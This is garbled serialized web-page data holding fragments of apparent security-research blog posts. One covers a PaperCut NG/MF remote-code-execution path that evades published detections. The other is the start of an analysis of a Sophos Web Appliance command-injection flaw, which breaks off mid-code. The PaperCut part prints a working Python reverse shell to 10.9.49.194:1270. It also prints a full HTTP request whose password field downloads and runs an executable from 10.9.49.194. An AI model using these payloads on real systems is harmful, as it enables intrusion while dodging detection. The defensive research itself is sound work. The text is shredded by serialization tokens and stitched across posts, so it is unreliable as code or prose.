socket,os,pty",[1373,99431,39663],{"class":1383},[1373,99433,94930],{"class":4640},[1373,99435,5417],{"class":1397},[1373,99437,99438],{"class":1391},"socket.socket",[1373,99440,1384],{"class":1383},[1373,99442,99443],{"class":2206},"socket.AF_INET,socket.SOCK_STREAM",[1373,99445,2344],{"class":1383},[1373,99447,99448],{"class":2206},"s.connect((",[1373,99450,99451],{"class":2206},"\"10.9.49.194\"",[1373,99453,99454],{"class":2206},",1270",[1373,99456,27548],{"class":4640},[1373,99458,39663],{"class":1383},[1373,99460,99461],{"class":2206},"os.dup2(s.fileno(",[1373,99463,99464],{"class":4640},"),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(\"\u002Fbin\u002Fsh\")&Form0=$Hidden$0,$Hidden$1,inputUsername,inputPassword,$Submit$0,$PropertySelection&$Hidden$0=true&$Hidden$1=X&$PropertySelection=en\n",[18,99466,2245,99467,99469],{},[886,99468,55448],{}," output is still suspicious, but at least the name of a famously malicious pentesting framework doesn’t appear:",[1354,99471,99473],{"className":31740,"code":99472,"language":2186,"meta":219,"style":219},"papercut   17572   \\_ \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor.conf wrapper.syslog.ident=paperc\npapercut   17574    \\_ ..\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fpc-app -Djava.io.tmpdir=tmp -Dserver.home=. 
-Xverify:none -XX:+UseParallelOldGC -server -Dpc-reserv\npapercut   43227       \\_ \u002Fusr\u002Fbin\u002Fpython3\npapercut   43232            \\_ \u002Fbin\u002Fsh\n",[886,99474,99475,99493,99524,99536],{"__ignoreMap":219},[1373,99476,99477,99479,99482,99484,99487,99490],{"class":1375,"line":1376},[1373,99478,98905],{"class":2206},[1373,99480,99481],{"class":5467},"   17572",[1373,99483,79157],{"class":2326},[1373,99485,99486],{"class":1391}," \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor",[1373,99488,99489],{"class":1391}," \u002Fhome\u002Fpapercut\u002Fserver\u002Fbin\u002Flinux-x64\u002F.\u002Fapp-monitor.conf",[1373,99491,99492],{"class":1391}," wrapper.syslog.ident=paperc\n",[1373,99494,99495,99497,99500,99503,99506,99509,99512,99515,99518,99521],{"class":1375,"line":220},[1373,99496,98905],{"class":2206},[1373,99498,99499],{"class":5467},"   17574",[1373,99501,99502],{"class":2326},"    \\_",[1373,99504,99505],{"class":1391}," ..\u002Fruntime\u002Flinux-x64\u002Fjre\u002Fbin\u002Fpc-app",[1373,99507,99508],{"class":2209}," -Djava.io.tmpdir=tmp",[1373,99510,99511],{"class":2209}," -Dserver.home=.",[1373,99513,99514],{"class":2209}," -Xverify:none",[1373,99516,99517],{"class":2209}," -XX:+UseParallelOldGC",[1373,99519,99520],{"class":2209}," -server",[1373,99522,99523],{"class":2209}," -Dpc-reserv\n",[1373,99525,99526,99528,99531,99533],{"class":1375,"line":1266},[1373,99527,98905],{"class":2206},[1373,99529,99530],{"class":5467},"   43227",[1373,99532,98946],{"class":2326},[1373,99534,99535],{"class":1391}," \u002Fusr\u002Fbin\u002Fpython3\n",[1373,99537,99538,99540,99543,99546],{"class":1375,"line":1852},[1373,99539,98905],{"class":2206},[1373,99541,99542],{"class":5467},"   43232",[1373,99544,99545],{"class":2326},"            \\_",[1373,99547,98936],{"class":1391},[18,99549,99550,99551,99553,99554,99556,99557,99559],{},"On the Windows side of things, we’ve chosen ",[886,99552,83469],{}," as our authentication 
program. ",[886,99555,83469],{}," will execute arbitrary commands if they are prepended with a bang (",[886,99558,16090],{},"). On the wire, that looks like this:",[1354,99561,99563],{"className":31740,"code":99562,"language":2186,"meta":219,"style":219},"POST \u002Fapp HTTP\u002F1.1\nHost: 10.9.49.195:9191\nUser-Agent: Mozilla\u002F5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F105.0.0.0 Safari\u002F537.36 Edg\u002F105.0.1343.33\nContent-Length: 360\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: JSESSIONID=node012xt0dzcjh0dy5wz7uvh9m26f23.node0\nOrigin: http:\u002F\u002F10.9.49.195:9191\u002F\nReferer: http:\u002F\u002F10.9.49.195:9191\u002Fapp\nAccept-Encoding: gzip\nForm0=$Hidden$0,$Hidden$1,inputUsername,inputPassword,$Submit$0,$PropertySelection&$PropertySelection=en&inputUsername=dir&service=direct\u002F1\u002FHome\u002F$Form&sp=S0&$Hidden$0=true&$Hidden$1=X&$Submit$0=Log+in&inputPassword=!curl -s -A Mozilla\u002F5.0 -o C:\\ProgramData\\AXtJxdUwlfJl.exe http:\u002F\u002F10.9.49.194:8080\u002FAXtJxdUwlfJl %26 C:\\ProgramData\\AXtJxdUwlfJl.exe 10.9.49.194 1270\n",[886,99564,99565,99573,99580,99610,99617,99623,99630,99637,99644,99650],{"__ignoreMap":219},[1373,99566,99567,99569,99571],{"class":1375,"line":1376},[1373,99568,6946],{"class":2206},[1373,99570,99276],{"class":1391},[1373,99572,35589],{"class":1391},[1373,99574,99575,99577],{"class":1375,"line":220},[1373,99576,99283],{"class":2206},[1373,99578,99579],{"class":1391}," 
10.9.49.195:9191\n",[1373,99581,99582,99584,99586,99588,99590,99592,99594,99596,99598,99600,99602,99604,99606,99608],{"class":1375,"line":1266},[1373,99583,99291],{"class":2206},[1373,99585,99294],{"class":1391},[1373,99587,99297],{"class":4640},[1373,99589,99300],{"class":1391},[1373,99591,99303],{"class":5467},[1373,99593,39663],{"class":1383},[1373,99595,99308],{"class":2206},[1373,99597,39663],{"class":1383},[1373,99599,99313],{"class":2206},[1373,99601,99316],{"class":4640},[1373,99603,99319],{"class":2206},[1373,99605,99322],{"class":1391},[1373,99607,99325],{"class":1391},[1373,99609,99328],{"class":4640},[1373,99611,99612,99614],{"class":1375,"line":1852},[1373,99613,99333],{"class":2206},[1373,99615,99616],{"class":5467}," 360\n",[1373,99618,99619,99621],{"class":1375,"line":4692},[1373,99620,99341],{"class":2206},[1373,99622,7185],{"class":1391},[1373,99624,99625,99627],{"class":1375,"line":4724},[1373,99626,99348],{"class":2206},[1373,99628,99629],{"class":1391}," JSESSIONID=node012xt0dzcjh0dy5wz7uvh9m26f23.node0\n",[1373,99631,99632,99634],{"class":1375,"line":4756},[1373,99633,99356],{"class":2206},[1373,99635,99636],{"class":1391}," http:\u002F\u002F10.9.49.195:9191\u002F\n",[1373,99638,99639,99641],{"class":1375,"line":4768},[1373,99640,99364],{"class":2206},[1373,99642,99643],{"class":1391}," 
http:\u002F\u002F10.9.49.195:9191\u002Fapp\n",[1373,99645,99646,99648],{"class":1375,"line":4792},[1373,99647,99372],{"class":2206},[1373,99649,99375],{"class":1391},[1373,99651,99652,99655,99657,99660,99662,99664,99666,99669,99672,99674,99676,99678,99681,99683,99686,99688,99690,99692,99695,99697,99699,99701,99703,99705,99707,99709,99711,99713,99715,99717,99719,99722,99724,99726,99728,99731,99733,99735,99737,99739,99741,99743,99745,99748,99750,99753,99755,99757,99760,99763,99766,99768,99771,99774,99777,99779,99781,99783,99785,99787,99790],{"class":1375,"line":4798},[1373,99653,99654],{"class":4640},"Form0",[1373,99656,5417],{"class":1397},[1373,99658,99659],{"class":4640},"$Hidden",[1373,99661,99406],{"class":19096},[1373,99663,5437],{"class":1391},[1373,99665,99659],{"class":4640},[1373,99667,99668],{"class":19096},"$1",[1373,99670,99671],{"class":1391},",inputUsername,inputPassword,",[1373,99673,99403],{"class":4640},[1373,99675,99406],{"class":19096},[1373,99677,5437],{"class":1391},[1373,99679,99680],{"class":4640},"$PropertySelection",[1373,99682,7218],{"class":1383},[1373,99684,99685],{"class":4640},"$PropertySelection=en",[1373,99687,7218],{"class":1383},[1373,99689,99414],{"class":4640},[1373,99691,5417],{"class":1397},[1373,99693,99694],{"class":1391},"dir",[1373,99696,7218],{"class":1383},[1373,99698,99380],{"class":4640},[1373,99700,5417],{"class":1397},[1373,99702,99385],{"class":1391},[1373,99704,99388],{"class":4640},[1373,99706,7218],{"class":1383},[1373,99708,99393],{"class":4640},[1373,99710,5417],{"class":1397},[1373,99712,99398],{"class":1391},[1373,99714,7218],{"class":1383},[1373,99716,99659],{"class":4640},[1373,99718,99406],{"class":19096},[1373,99720,99721],{"class":4640},"=true",[1373,99723,7218],{"class":1383},[1373,99725,99659],{"class":4640},[1373,99727,99668],{"class":19096},[1373,99729,99730],{"class":4640},"=X",[1373,99732,7218],{"class":1383},[1373,99734,99403],{"class":4640},[1373,99736,99406],{"class":19096},[1373,99738,99409],{"cla
ss":4640},[1373,99740,7218],{"class":1383},[1373,99742,99263],{"class":4640},[1373,99744,5417],{"class":1397},[1373,99746,99747],{"class":1391},"!curl",[1373,99749,2239],{"class":2206},[1373,99751,99752],{"class":2209}," -A",[1373,99754,99294],{"class":1391},[1373,99756,39692],{"class":2209},[1373,99758,99759],{"class":1391}," C:",[1373,99761,99762],{"class":2326},"\\P",[1373,99764,99765],{"class":1391},"rogramData",[1373,99767,74616],{"class":2326},[1373,99769,99770],{"class":1391},"XtJxdUwlfJl.exe",[1373,99772,99773],{"class":1391}," http:\u002F\u002F10.9.49.194:8080\u002FAXtJxdUwlfJl",[1373,99775,99776],{"class":1391}," %26",[1373,99778,99759],{"class":1391},[1373,99780,99762],{"class":2326},[1373,99782,99765],{"class":1391},[1373,99784,74616],{"class":2326},[1373,99786,99770],{"class":1391},[1373,99788,99789],{"class":5467}," 10.9.49.194",[1373,99791,38925],{"class":5467},[18,99793,99794,99795,99797,99798,99801,99802,99804,99805,99807,99808,99810,99811,99810,99813,99810,99815,59],{},"The attack we’ve chosen is really quite basic. The ",[886,99796,99263],{}," contains logic to download a binary to ",[886,99799,99800],{},"C:\\ProgramData\\"," and execute it. In our case, this binary is a custom reverse shell (written in Go).  The result is that ",[886,99803,14509],{}," is never a direct child of ",[886,99806,98994],{},". The process tree is: ",[886,99809,98994],{}," -> ",[886,99812,83469],{},[886,99814,14509],{},[886,99816,99817],{},"AXtJxdUwlfJI.exe",[18,99819,99820],{},[68,99821],{":width":10862,"alt":99822,"src":99823},"Process creation events","\u002Fblog\u002Fpapercut-rce\u002Fftpspawnscmd.png",[18,99825,99826],{},"The process tree, quite obviously, demonstrates poor tradecraft, but it’s sufficient to work around the published process-creation-based detections discussed earlier.",[18,99828,99829],{},"Importantly, because this approach doesn’t use a scripting interface, this attack also doesn’t generate the expected log entries. 
An attack using the “User\u002FGroup” custom program will generate logs that look more like this:",[1354,99831,99834],{"className":99832,"code":99833,"language":1359},[1357],"User\u002FGroup Sync settings changed by \"admin\"\nUser \"admin\" logged into the administration interface.\n",[886,99835,99833],{"__ignoreMap":219},[18,99837,99838],{},"The full result is that we can establish reverse shells on both Windows and Linux targets without triggering any detections.",[33917,99840],{"id":99841,"title":83462},"NTYQaZsFxiI",[1920,99843,1903],{"id":1902},[18,99845,99846],{},"An administrative user attacking PaperCut NG and MF can follow multiple paths to arbitrary code execution. Detections that focus on one particular code execution method, or that focus on a small subset of techniques used by one threat actor are doomed to be useless in the next round of attacks. Attackers learn from defenders' public detections, so it’s the defenders’ responsibility to produce robust detections that aren’t easily bypassed.",[2901,99848,99849],{},"html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: 
var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code 
.sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sQgqH, html code.shiki .sQgqH{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#E36209;--shiki-default-font-style:inherit;--shiki-dark:#FFAB70;--shiki-dark-font-style:inherit;--shiki-sepia:#FD971F;--shiki-sepia-font-style:italic}",{"title":219,"searchDepth":220,"depth":220,"links":99851},[99852,99853,99854,99858],{"id":98770,"depth":220,"text":98771},{"id":84830,"depth":220,"text":84831},{"id":98954,"depth":220,"text":98955,"children":99855},[99856,99857],{"id":98972,"depth":1266,"text":98973},{"id":99036,"depth":1266,"text":99037},{"id":99052,"depth":220,"text":99053},"Public exploits and detections for CVE-2023-27350 focus on code execution using the PaperCut print scripting interface. In this blog, VulnCheck shares a new code execution vector and demonstrates how existing detections aren't robust enough to flag the new activity.",{"slug":99861},"papercut-rce","\u002Fblog\u002Fpapercut-rce",{"title":83462,"description":99859},"blog\u002Fpapercut-rce",[242],"-QeLVvdXgVrllkIRUlvLs5jLckg2JP6wSS-FreeE9uw",{"id":99868,"title":99869,"articles":99870,"authors":99877,"body":99883,"date":100720,"description":100721,"extension":234,"image":7,"link":7,"meta":100722,"navigation":237,"path":100724,"seo":100725,"series":7,"stem":100726,"subtype":7,"tags":100727,"__hash__":100728},"blog\u002Fblog\u002Fcve-2023-1671-analysis.md","Analysis of Pre-Auth RCE in Sophos Web Appliance (CVE-2023-1671) VulnCheck",[99871,99874],{"title":99872,"source":3494,"link":99873,"date":61690},"UK GovAssure program to run annual security audits on government 
departments","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-uk-govassure-program",{"title":99875,"source":23286,"link":99876,"date":81109},"Rust Won’t Save Us: An Analysis of 2023’s Known Exploited Vulnerabilities","https:\u002F\u002Fsecurityboulevard.com\u002F2024\u002F02\u002Frust-wont-save-us-an-analysis-of-2023s-known-exploited-vulnerabilities\u002F",[99878],{"name":99879,"avatar":99880,"link":99881,"linkName":99882},"William Vu","\u002Favatars\u002Fwvu.jpg","https:\u002F\u002Ftwitter.com\u002Fwvuuuuuuuuuuuuu","@wvuuuuuuuuuuuuu",{"type":15,"value":99884,"toc":100717},[99885,99902,99907,99914,99918,99921,99934,99937,99941,99955,100013,100024,100550,100561,100565,100587,100596,100606,100646,100664,100672,100677,100681,100688,100694,100700,100702,100704,100714],[18,99886,99887,99888,99890,99891,99896,99897,4606],{},"On April 4, 2023, Sophos published a security advisory",[47,99889,467],{"href":36220}," for their Web Appliance product. The advisory includes information on ",[47,99892,99895],{"href":99893,"rel":99894},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-1671",[51],"CVE-2023-1671",", a critical vulnerability in versions prior to ",[47,99898,99901],{"href":99899,"rel":99900},"https:\u002F\u002Fwsa.sophos.com\u002Fdocs\u002Fws1000\u002Fws1000\u002Fconcepts\u002FReleaseNotes_4.3.10.4.html",[51],"4.3.10.4",[1925,99903,99904],{},[18,99905,99906],{},"A pre-auth command injection vulnerability in the warn-proceed handler allowing execution of arbitrary code was discovered and responsibly disclosed to Sophos by an external security researcher via the Sophos bug bounty program.",[18,99908,99909,99910,99913],{},"Given the ",[47,99911,2942],{"href":45535,"rel":99912},[51]," nature of the vulnerability, VulnCheck decided to investigate.",[1920,99915,99917],{"id":99916},"bluf-mass-exploitation-unlikely","BLUF: Mass Exploitation Unlikely",[18,99919,99920],{},"The notes in the advisory detail the caveats quite 
well:",[1925,99922,99923],{},[22,99924,99925,99928,99931],{},[25,99926,99927],{},"End of Life date for Sophos Web Appliance is on July 20, 2023",[25,99929,99930],{},"Sophos recommends that Sophos Web Appliance is protected by a firewall and not accessible via the public Internet",[25,99932,99933],{},"There is no action required for Sophos Web Appliance customers, as updates are installed automatically by default",[18,99935,99936],{},"Consequently, exploitation at scale is highly unlikely.",[1920,99938,99940],{"id":99939},"analyzing-the-patch","Analyzing the Patch",[18,99942,99943,99946,99947,99950,99951,99954],{},[886,99944,99945],{},"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack"," is a Perl script that shells out to ",[886,99948,99949],{},"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack",", which is another Perl script. The patch changes the ",[886,99952,99953],{},"system"," function's invocation such that the shell is no longer invoked:",[1354,99956,99959],{"className":99957,"code":99958,"language":11815,"meta":219,"style":219},"language-diff shiki shiki-themes material-theme-lighter github-light github-dark monokai","--- unpatched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack   2022-04-08 20:38:49.000000000 -0500\n+++ patched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack 2023-03-24 17:08:26.000000000 -0500\n@@ -25,7 +25,7 @@\n     open my $flag, \">\", \"$flag_file_dir\u002F$proceeded_flag_file\" or die \"Open file [$flag_file_dir\u002F$proceeded_flag_file] failed\" and $rc++;\n     close($flag);\n\n-    $rc += system(\"$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'\");\n+    $rc += system($sblistpack, $uri, $user, $filetype, $filein, $fileout);\n }\n\n exit $rc;\n",[886,99960,99961,99966,99971,99976,99981,99986,99990,99995,100000,100004,100008],{"__ignoreMap":219},[1373,99962,99963],{"class":1375,"line":1376},[1373,99964,99965],{},"--- unpatched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack   2022-04-08 20:38:49.000000000 
-0500\n",[1373,99967,99968],{"class":1375,"line":220},[1373,99969,99970],{},"+++ patched\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack 2023-03-24 17:08:26.000000000 -0500\n",[1373,99972,99973],{"class":1375,"line":1266},[1373,99974,99975],{},"@@ -25,7 +25,7 @@\n",[1373,99977,99978],{"class":1375,"line":1852},[1373,99979,99980],{},"     open my $flag, \">\", \"$flag_file_dir\u002F$proceeded_flag_file\" or die \"Open file [$flag_file_dir\u002F$proceeded_flag_file] failed\" and $rc++;\n",[1373,99982,99983],{"class":1375,"line":4692},[1373,99984,99985],{},"     close($flag);\n",[1373,99987,99988],{"class":1375,"line":4724},[1373,99989,6520],{"emptyLinePlaceholder":237},[1373,99991,99992],{"class":1375,"line":4756},[1373,99993,99994],{},"-    $rc += system(\"$sblistpack '$uri' '$user' '$filetype' '$filein' '$fileout'\");\n",[1373,99996,99997],{"class":1375,"line":4768},[1373,99998,99999],{},"+    $rc += system($sblistpack, $uri, $user, $filetype, $filein, $fileout);\n",[1373,100001,100002],{"class":1375,"line":4792},[1373,100003,35334],{},[1373,100005,100006],{"class":1375,"line":4798},[1373,100007,6520],{"emptyLinePlaceholder":237},[1373,100009,100010],{"class":1375,"line":4806},[1373,100011,100012],{}," exit $rc;\n",[18,100014,100015,100016,100019,100020,100023],{},"Note the single-quoted arguments to the shell command in the unpatched code. This will be important later. 
Tracing from sink to source, we can see that ",[886,100017,100018],{},"\u002Fopt\u002Fui\u002Fapache\u002Fhtdocs\u002Fcontrollers\u002FUsrBlocked.php"," shells out to ",[886,100021,100022],{},"ftsblistpack"," with user-supplied parameters:",[1354,100025,100027],{"className":1367,"code":100026,"language":1369,"meta":219,"style":219},"        if($_GET['action'] == 'continue') {\n\n                    if(strlen(trim($_POST['user'])) > 0)\n                        $user = base64_decode($_POST['user_encoded']);\n                    else\n                        $user = $_POST['client-ip'];\n                    if($user == '-') $user = $_POST['client-ip'];\n                    $user = escapeshellarg($user);\n\u002F\u002Fsnip\n                        \u002F\u002F use sblistpack to allow access\n                        if($_POST['args_reason'] == 'filetypewarn') {\n                            $key = $_POST['url'];\n                            $packer = '\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack';\n                            $value = $_POST['filetype'];\n                        }\n                        else {\n                            $key = $_POST['domain'];\n                            $packer = '\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack';\n                            $catParts = explode(\"|\",$_POST['raw_category_id']);\n                            $value = $catParts[0];\n                        }\n\n                        $key = escapeshellarg($key);\n                        $value = escapeshellarg($value);\n                        $this->log->write(\"DEBUG\",\"cmd = '$packer $key $user $value'\");\n                        $result = shell_exec(\"$packer $key $user $value 
2>&1\");\n",[886,100028,100029,100062,100066,100100,100128,100132,100155,100193,100211,100216,100221,100253,100277,100294,100318,100322,100329,100352,100368,100402,100421,100425,100429,100445,100461,100512],{"__ignoreMap":219},[1373,100030,100031,100033,100035,100038,100040,100042,100045,100047,100049,100051,100053,100056,100058,100060],{"class":1375,"line":1376},[1373,100032,9773],{"class":4636},[1373,100034,34467],{"class":1383},[1373,100036,100037],{"class":4640},"_GET",[1373,100039,7035],{"class":1383},[1373,100041,1388],{"class":1387},[1373,100043,100044],{"class":1391},"action",[1373,100046,1388],{"class":1387},[1373,100048,15050],{"class":1383},[1373,100050,16406],{"class":1397},[1373,100052,4713],{"class":1387},[1373,100054,100055],{"class":1391},"continue",[1373,100057,1388],{"class":1387},[1373,100059,2230],{"class":1383},[1373,100061,4765],{"class":1383},[1373,100063,100064],{"class":1375,"line":220},[1373,100065,6520],{"emptyLinePlaceholder":237},[1373,100067,100068,100070,100072,100075,100077,100079,100081,100084,100086,100088,100090,100092,100094,100096,100098],{"class":1375,"line":1266},[1373,100069,15824],{"class":4636},[1373,100071,1384],{"class":1383},[1373,100073,100074],{"class":1379},"strlen",[1373,100076,1384],{"class":1383},[1373,100078,35140],{"class":1379},[1373,100080,34467],{"class":1383},[1373,100082,100083],{"class":4640},"_POST",[1373,100085,7035],{"class":1383},[1373,100087,1388],{"class":1387},[1373,100089,39933],{"class":1391},[1373,100091,1388],{"class":1387},[1373,100093,47955],{"class":1383},[1373,100095,11741],{"class":1397},[1373,100097,5557],{"class":5467},[1373,100099,11875],{"class":1383},[1373,100101,100102,100105,100108,100110,100113,100115,100117,100119,100121,100124,100126],{"class":1375,"line":1852},[1373,100103,100104],{"class":1383},"                        $",[1373,100106,100107],{"class":4640},"user ",[1373,100109,5417],{"class":1397},[1373,100111,100112],{"class":1379}," 
base64_decode",[1373,100114,34467],{"class":1383},[1373,100116,100083],{"class":4640},[1373,100118,7035],{"class":1383},[1373,100120,1388],{"class":1387},[1373,100122,100123],{"class":1391},"user_encoded",[1373,100125,1388],{"class":1387},[1373,100127,34850],{"class":1383},[1373,100129,100130],{"class":1375,"line":4692},[1373,100131,15948],{"class":4636},[1373,100133,100134,100136,100138,100140,100142,100144,100146,100148,100151,100153],{"class":1375,"line":4724},[1373,100135,100104],{"class":1383},[1373,100137,100107],{"class":4640},[1373,100139,5417],{"class":1397},[1373,100141,4656],{"class":1383},[1373,100143,100083],{"class":4640},[1373,100145,7035],{"class":1383},[1373,100147,1388],{"class":1387},[1373,100149,100150],{"class":1391},"client-ip",[1373,100152,1388],{"class":1387},[1373,100154,34699],{"class":1383},[1373,100156,100157,100159,100161,100163,100165,100167,100169,100171,100173,100175,100177,100179,100181,100183,100185,100187,100189,100191],{"class":1375,"line":4756},[1373,100158,15824],{"class":4636},[1373,100160,34467],{"class":1383},[1373,100162,100107],{"class":4640},[1373,100164,15920],{"class":1397},[1373,100166,4713],{"class":1387},[1373,100168,61062],{"class":1391},[1373,100170,1388],{"class":1387},[1373,100172,2230],{"class":1383},[1373,100174,4656],{"class":1383},[1373,100176,100107],{"class":4640},[1373,100178,5417],{"class":1397},[1373,100180,4656],{"class":1383},[1373,100182,100083],{"class":4640},[1373,100184,7035],{"class":1383},[1373,100186,1388],{"class":1387},[1373,100188,100150],{"class":1391},[1373,100190,1388],{"class":1387},[1373,100192,34699],{"class":1383},[1373,100194,100195,100198,100200,100202,100205,100207,100209],{"class":1375,"line":4768},[1373,100196,100197],{"class":1383},"                    $",[1373,100199,100107],{"class":4640},[1373,100201,5417],{"class":1397},[1373,100203,100204],{"class":1379}," 
escapeshellarg",[1373,100206,34467],{"class":1383},[1373,100208,39933],{"class":4640},[1373,100210,4680],{"class":1383},[1373,100212,100213],{"class":1375,"line":4792},[1373,100214,100215],{"class":4630},"\u002F\u002Fsnip\n",[1373,100217,100218],{"class":1375,"line":4798},[1373,100219,100220],{"class":4630},"                        \u002F\u002F use sblistpack to allow access\n",[1373,100222,100223,100225,100227,100229,100231,100233,100236,100238,100240,100242,100244,100247,100249,100251],{"class":1375,"line":4806},[1373,100224,16106],{"class":4636},[1373,100226,34467],{"class":1383},[1373,100228,100083],{"class":4640},[1373,100230,7035],{"class":1383},[1373,100232,1388],{"class":1387},[1373,100234,100235],{"class":1391},"args_reason",[1373,100237,1388],{"class":1387},[1373,100239,15050],{"class":1383},[1373,100241,16406],{"class":1397},[1373,100243,4713],{"class":1387},[1373,100245,100246],{"class":1391},"filetypewarn",[1373,100248,1388],{"class":1387},[1373,100250,2230],{"class":1383},[1373,100252,4765],{"class":1383},[1373,100254,100255,100258,100261,100263,100265,100267,100269,100271,100273,100275],{"class":1375,"line":4817},[1373,100256,100257],{"class":1383},"                            $",[1373,100259,100260],{"class":4640},"key ",[1373,100262,5417],{"class":1397},[1373,100264,4656],{"class":1383},[1373,100266,100083],{"class":4640},[1373,100268,7035],{"class":1383},[1373,100270,1388],{"class":1387},[1373,100272,7585],{"class":1391},[1373,100274,1388],{"class":1387},[1373,100276,34699],{"class":1383},[1373,100278,100279,100281,100284,100286,100288,100290,100292],{"class":1375,"line":4825},[1373,100280,100257],{"class":1383},[1373,100282,100283],{"class":4640},"packer 
",[1373,100285,5417],{"class":1397},[1373,100287,4713],{"class":1387},[1373,100289,99945],{"class":1391},[1373,100291,1388],{"class":1387},[1373,100293,4912],{"class":1383},[1373,100295,100296,100298,100301,100303,100305,100307,100309,100311,100314,100316],{"class":1375,"line":4835},[1373,100297,100257],{"class":1383},[1373,100299,100300],{"class":4640},"value ",[1373,100302,5417],{"class":1397},[1373,100304,4656],{"class":1383},[1373,100306,100083],{"class":4640},[1373,100308,7035],{"class":1383},[1373,100310,1388],{"class":1387},[1373,100312,100313],{"class":1391},"filetype",[1373,100315,1388],{"class":1387},[1373,100317,34699],{"class":1383},[1373,100319,100320],{"class":1375,"line":4843},[1373,100321,16207],{"class":1383},[1373,100323,100324,100327],{"class":1375,"line":4849},[1373,100325,100326],{"class":4636},"                        else",[1373,100328,4765],{"class":1383},[1373,100330,100331,100333,100335,100337,100339,100341,100343,100345,100348,100350],{"class":1375,"line":4877},[1373,100332,100257],{"class":1383},[1373,100334,100260],{"class":4640},[1373,100336,5417],{"class":1397},[1373,100338,4656],{"class":1383},[1373,100340,100083],{"class":4640},[1373,100342,7035],{"class":1383},[1373,100344,1388],{"class":1387},[1373,100346,100347],{"class":1391},"domain",[1373,100349,1388],{"class":1387},[1373,100351,34699],{"class":1383},[1373,100353,100354,100356,100358,100360,100362,100364,100366],{"class":1375,"line":4915},[1373,100355,100257],{"class":1383},[1373,100357,100283],{"class":4640},[1373,100359,5417],{"class":1397},[1373,100361,4713],{"class":1387},[1373,100363,99949],{"class":1391},[1373,100365,1388],{"class":1387},[1373,100367,4912],{"class":1383},[1373,100369,100370,100372,100375,100377,100379,100381,100383,100385,100387,100389,100391,100393,100395,100398,100400],{"class":1375,"line":4931},[1373,100371,100257],{"class":1383},[1373,100373,100374],{"class":4640},"catParts 
